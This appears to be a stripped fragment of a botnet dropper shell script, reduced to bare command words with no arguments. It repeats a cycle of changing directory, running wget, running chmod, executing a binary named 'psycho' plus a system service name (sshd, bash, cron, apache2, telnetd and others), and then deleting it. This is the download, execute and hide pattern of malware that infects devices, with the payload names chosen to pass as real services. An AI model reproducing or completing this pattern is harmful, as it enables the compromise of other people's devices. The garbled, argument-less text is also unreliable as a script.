cd
cd
cd
cd
cd
wget
chmod
psychontpd
rm
cd
cd
cd
cd
cd
wget
chmod
psychosshd
rm
cd
cd
cd
cd
cd
wget
chmod
psychoopenssh
rm
cd
cd
cd
cd
cd
wget
chmod
psychobash
rm
cd
cd
cd
cd
cd
wget
chmod
psychotftp
rm
cd
cd
cd
cd
cd
wget
chmod
psychowget
rm
cd
cd
cd
cd
cd
wget
chmod
psychocron
rm
cd
cd
cd
cd
cd
wget
chmod
psychoftp
rm
cd
cd
cd
cd
cd
wget
chmod
psychopftp
rm
cd
cd
cd
cd
cd
wget
chmod
psychosh
rm
cd
cd
cd
cd
cd
wget
chmod
psycho
rm
cd
cd
cd
cd
cd
wget
chmod
psychoapache2
rm
cd
cd
cd
cd
cd
wget
chmod
psychotelnetd
rm
